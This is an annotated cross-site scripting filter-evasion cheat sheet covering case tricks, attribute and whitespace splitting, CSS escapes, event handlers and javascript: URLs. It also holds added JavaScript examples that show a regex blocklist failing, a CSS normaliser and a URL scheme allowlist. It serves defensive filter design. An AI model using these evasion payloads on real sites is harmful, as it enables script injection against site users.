1. Change the case of the letters
<sCript>alert('d')</scRipT>
2. Add extra characters to get past a regular-expression check. A pattern such as <script[^>]*> stops at the first '>', so a '>' placed inside a quoted attribute value hides the rest of the tag from the pattern while the browser still parses the attribute normally.
<<script>alert('c')//<</script>
<SCRIPT a=">" SRC="t.js"></SCRIPT>
<SCRIPT =">" SRC="t.js"></SCRIPT>
<SCRIPT a=">" '' SRC="t.js"></SCRIPT>

<SCRIPT "a='>'" SRC="t.js"></SCRIPT>

<SCRIPT a=`>` SRC="t.js"></SCRIPT>

<SCRIPT a=">'>" SRC="t.js"></SCRIPT>

3. Use a different extension instead of .js. The browser executes whatever the SRC URL returns as script; the file extension plays no part, so a filter that only looks for ".js" is blind to this.

<script src="bad.jpg"></script>

4. Put the JavaScript inside a CSS file

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

example (contents of xss.css):

body {
background-image: url('javascript:alert("XSS");')
}

5. Insert extra characters inside the script tag. HTML parsers accept a slash as the separator between the tag name and its attributes, so a pattern that expects whitespace after "script" does not match.

<SCRIPT/SRC="t.js"></SCRIPT>

<SCRIPT/anyword SRC="t.js"></SCRIPT>
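
The following is an added example, not code from the original page: a hypothetical regex blocklist of the kind the vectors in sections 1, 2, 3 and 5 are written against, run over those payloads, beside an HTML output encoder that neutralises all of them regardless of spelling. The blocklist patterns, the payload names and the control string are this example's own assumptions.

```javascript
// Added example (not from the original page). A typical home-grown
// blocklist, and why each vector above slips past it.

// Hypothetical blocklist patterns, written for this example.
const BLOCKLIST = [
  /<script>/,                                  // case-sensitive literal: beaten by section 1
  /<script\s+[^>]*src\s*=\s*"[^"]*\.js"/i,     // "external .js include": beaten by sections 2, 3, 5
];

// What the naive filter decides for a given HTML fragment.
function naiveLooksMalicious(html) {
  return BLOCKLIST.some((re) => re.test(html));
}

// Payloads copied from the sections above.
const PAYLOADS = {
  mixedCase: `<sCript>alert('d')</scRipT>`,             // section 1: /<script>/ has no i flag
  gtInAttribute: `<SCRIPT a=">" SRC="t.js"></SCRIPT>`,  // section 2: [^>]* stops at the quoted ">"
  wrongExtension: `<script src="bad.jpg"></script>`,    // section 3: the server decides what bad.jpg returns
  slashSeparator: `<SCRIPT/SRC="t.js"></SCRIPT>`,       // section 5: \s+ expects whitespace after the tag name
};

// Control: the straightforward spelling the blocklist was written for.
const PLAIN_INCLUDE = `<script src="t.js"></script>`;

// Names of the payloads the blocklist lets through.
function evaders() {
  return Object.keys(PAYLOADS).filter((name) => !naiveLooksMalicious(PAYLOADS[name]));
}

// The fix is not a longer blocklist: encode untrusted data for the HTML
// text context so the browser never sees a tag, however it is spelled.
function encodeForHtml(s) {
  return s.replace(/[&<>"'`]/g, (c) => '&#x' + c.charCodeAt(0).toString(16) + ';');
}

// After encoding, no raw tag delimiter survives.
function isInertHtml(encoded) {
  return !/[<>]/.test(encoded);
}

console.log('blocklist catches the plain include:', naiveLooksMalicious(PLAIN_INCLUDE));
console.log('payloads that evade it:', evaders());
for (const p of Object.values(PAYLOADS)) console.log(encodeForHtml(p));
```

Run with node; the blocklist flags only the plain include and passes all four page payloads, while every encoded payload is inert text. The lesson the page's list illustrates is that the browser's parser, not the filter's regex, decides what is a tag; encoding for the output context sidesteps the mismatch entirely.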
6. Use tabs or newlines to evade. The page's rendering collapsed the control characters into spaces; the payloads have to be written with real tab or newline characters in the gaps.

<img src="jav ascr ipt:alert('XSS3')">    -> the gaps inside "javascript" are tab characters

<img src="jav ascr ipt:alert('XSS3')">    -> the gaps inside "javascript" are newlines

<IMG SRC="jav ascript:alert('XSS');">

7. Use backslash escapes (and CSS comments) to evade. CSS reads a backslash before a character as an escape for that character, so the style parser reassembles "expression" or "javascript" only after the filter has looked at the raw text. CSS expression() is an Internet Explorer extension that current browsers do not evaluate.

<STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

<IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

<IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

8. Use hex encoding to evade (the trailing ';' may also be dropped)

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

Source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

Source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">
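
The following is an added example, not code from the original page, serving sections 6, 7 and 8: it normalises a CSS value the way a style parser does (drops comments, but not inside quoted strings; decodes backslash and hex escapes; discards tabs and newlines) before looking for expression() or javascript:, so the page's disguised spellings collapse back to the plain form. The detection pattern and the hex-escape input (\65 for "e") are this example's own constructions; the other payloads are the page's.

```javascript
// Added example (not from the original page): normalise first, match second.

// What a filter matching the raw attribute value looks for (hypothetical).
const DANGEROUS = /expression\s*\(|javascript\s*:/i;

function naiveCssCheck(value) {
  return DANGEROUS.test(value);
}

// Remove /* ... */ comments, except inside quoted strings, where the
// section 7 "*//*" trick would otherwise open a bogus comment and swallow
// the real "expression" that follows the string.
function stripCssComments(value) {
  let out = '';
  let i = 0;
  while (i < value.length) {
    const c = value[i];
    if (c === '"' || c === "'") {
      const quote = c;
      out += c; i += 1;
      while (i < value.length && value[i] !== quote) {
        if (value[i] === '\\' && i + 1 < value.length) { out += value[i] + value[i + 1]; i += 2; }
        else { out += value[i]; i += 1; }
      }
      if (i < value.length) { out += value[i]; i += 1; }   // closing quote
    } else if (c === '/' && value[i + 1] === '*') {
      const end = value.indexOf('*/', i + 2);
      i = end === -1 ? value.length : end + 2;
    } else {
      out += c; i += 1;
    }
  }
  return out;
}

function normalizeCss(value) {
  let s = stripCssComments(value);
  // \HH...: hex escape of 1-6 digits plus one optional whitespace, e.g. \65 -> "e" (section 8)
  s = s.replace(/\\([0-9a-fA-F]{1,6})[ \t\n\r\f]?/g, (_, hex) => String.fromCodePoint(parseInt(hex, 16)));
  // \c: escape of a non-hex character, e.g. expre\ssion -> expression (section 7)
  s = s.replace(/\\([^\n])/g, '$1');
  // tabs, newlines, CR and FF split a name without changing it (section 6)
  return s.replace(/[\t\n\r\f]/g, '');
}

function normalizedCssCheck(value) {
  return DANGEROUS.test(normalizeCss(value));
}

const PAYLOADS = [
  String.raw`xss:expre\ssion(alert("XSS33"))`,                                // section 7
  String.raw`xss:expr/*anyword*/ession(alert('sss'))`,                        // section 7
  String.raw`width: expre\ssi\on(alert('XSS31'));`,                            // sections 7 and 8
  String.raw`no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))`,  // section 7
  String.raw`@im\port'\ja\vasc\ript:alert("XSS32")';`,                         // section 7
  'background-image: url("jav\tascr\nipt:alert(\'XSS3\')")',                   // section 6, real tab and newline
  String.raw`width: expr\65 ssion(alert(1))`,                                  // constructed: CSS hex escape for "e"
];

// [hits on the raw text, hits after normalisation] across all payloads.
function countDetections(list = PAYLOADS) {
  return [list.filter(naiveCssCheck).length, list.filter(normalizedCssCheck).length];
}

console.log('raw vs normalised detections:', countDetections());
```

The comment stripper is the part worth noticing: a plain /\*.*?\*/ regex misreads the "*//*" inside the quoted string of the last section 7 vector, deletes everything up to the real comment, and loses the "expression" the browser will see. Matching must follow the tokenizer's rules, or the filter and the parser disagree, which is exactly what every vector on this page exploits.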
9. Script in HTML tag event-handler attributes. Any of the handlers listed below works the same way; a filter that blocklists handler names will always lag behind the browsers (many of these are Internet Explorer-specific), so allow only known-safe attributes instead.

<body onload="alert('onload')">

onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
10. XSS code inside a .swf file. AllowScriptAccess="always" lets the Flash movie call into the page's JavaScript.

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

11. Use CDATA to split the XSS code so that it is reassembled when the data island is bound. XML data islands and the DATASRC/DATAFLD binding are Internet Explorer features.

<XML ID=I><X><C>
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</C></X>
</xml>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

12. Use HTML+TIME (an Internet Explorer-only extension).

<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="anyword<SCRIPT DEFER>alert("XSS")</SCRIPT>">
</BODY></HTML>

13. Write a cookie via META. This only pays off where the application later echoes the cookie value into a page unescaped.

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

14. javascript: in src, href and url(). Current browsers still execute javascript: URLs in navigation contexts such as IFRAME and FRAME SRC; the IMG, LINK, TABLE BACKGROUND and CSS url() forms below relied on old Internet Explorer and Netscape behaviour, and DYNSRC and LOWSRC are legacy attributes.

<IFRAME SRC=javascript:alert('13')></IFRAME>

<img src="javascript:alert('XSS3')">

<IMG DYNSRC="javascript:alert('XSS20')">

<IMG LOWSRC="javascript:alert('XSS21')">

<LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

<IFRAME SRC=javascript:alert('XSS27')></IFRAME>

<TABLE BACKGROUND="javascript:alert('XSS29')">

<DIV STYLE="background-image: url(javascript:alert('XSS30'))">

<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}
</STYLE><A CLASS=XSS></A>

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
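
The following is an added example, not code from the original page: a scheme allowlist for src and href values that first undoes what the browser undoes (HTML character references, with or without the trailing ';', and the tab, LF and CR characters the URL parser discards) and then accepts only http:, https: or scheme-less URLs. This is the check a practitioner wants for sections 6 and 14 instead of a javascript: blocklist. The character-reference decoder is deliberately minimal, and the entity-encoded and control-character inputs are constructed for this example; the other payloads are the page's.

```javascript
// Added example (not from the original page): allowlist the scheme after
// normalising the way a browser does.

// Decode &#NNN; and &#xHH; (semicolon optional, which is how the
// "drop the ;" variants of section 8 are written) plus &amp;.
// Small on purpose: numeric references and one named reference only.
function decodeCharRefs(s) {
  return s
    .replace(/&#x([0-9a-f]{1,6});?/gi, (_, h) => String.fromCodePoint(parseInt(h, 16)))
    .replace(/&#(\d{1,7});?/g, (_, d) => String.fromCodePoint(parseInt(d, 10)))
    .replace(/&amp;?/g, '&');
}

// The URL parser removes every ASCII tab, LF and CR from its input and
// trims leading/trailing C0 controls and spaces; section 6 relies on
// filters not doing the same.
function normalizeUrl(raw) {
  return decodeCharRefs(raw)
    .replace(/[\t\n\r]/g, '')
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, '');
}

const ALLOWED_SCHEMES = new Set(['http', 'https']);

function isSafeUrl(raw) {
  const url = normalizeUrl(raw);
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(url);   // scheme syntax per RFC 3986
  if (!m) return true;   // no scheme: inherits the page's http(s) scheme, so it cannot be javascript:
  return ALLOWED_SCHEMES.has(m[1].toLowerCase());
}

// Attribute values taken from sections 6 and 14.
const PAGE_PAYLOADS = [
  "javascript:alert('13')",          // IFRAME SRC
  "javascript:alert('XSS3')",        // IMG SRC
  "jav\tascr\tipt:alert('XSS3')",    // section 6, real tabs
  "jav\nascr\nipt:alert('XSS3')",    // section 6, real newlines
];

// Constructed for this example: the same scheme behind other encodings.
const CONSTRUCTED = [
  'JaVaScRiPt:alert(1)',             // section 1 applied to the scheme
  '&#106;avascript:alert(1)',        // decimal reference for "j"
  '&#x6A&#x61vascript:alert(1)',     // hex references without ';'
  ' \u0001javascript:alert(1)',      // leading space and control character
];

// Values that must keep working.
const BENIGN = [
  'http://ha.ckers.org/xss.css',     // section 4
  'https://example.test/t.js',
  '/images/logo.png',
  't.js',
];

function rejectedCount(list) {
  return list.filter((u) => !isSafeUrl(u)).length;
}

console.log('page payloads rejected:', rejectedCount(PAGE_PAYLOADS), 'of', PAGE_PAYLOADS.length);
console.log('constructed payloads rejected:', rejectedCount(CONSTRUCTED), 'of', CONSTRUCTED.length);
console.log('benign URLs rejected:', rejectedCount(BENIGN));
```

Because the decision is "is the scheme one of two known-good values" rather than "does the string contain javascript", none of the case, whitespace or character-reference variations matter: they all normalise to the same rejected scheme, and a new scheme such as data: is rejected without any change to the code.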